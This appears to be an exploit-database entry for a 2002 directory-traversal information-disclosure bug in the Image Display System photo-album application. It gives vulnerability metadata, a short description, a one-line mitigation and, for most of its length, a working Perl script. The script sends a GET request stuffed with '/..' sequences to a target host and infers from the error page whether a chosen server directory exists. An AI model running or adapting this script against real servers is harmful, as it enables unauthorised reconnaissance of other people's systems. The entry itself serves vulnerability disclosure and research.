IDS Information Disclosure Exploit

vendor:

Image Display System

by:

isox

7.5

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: Image Display System

Affected Version From: 0.8x

Affected Version To: 0.8x

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Perl

2002

IDS Information Disclosure Exploit

IDS (Image Display System) is an web based photo album application written in Perl. This vulnerability allows attackers to confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating user input and sanitizing user input.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4870/info

IDS (Image Display System) is an web based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.

Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not. 

#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [isox@chainsawbeer.com]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [isox\@chainsawbeer.com]\n\n");
}


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }


  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

<-- EOF -->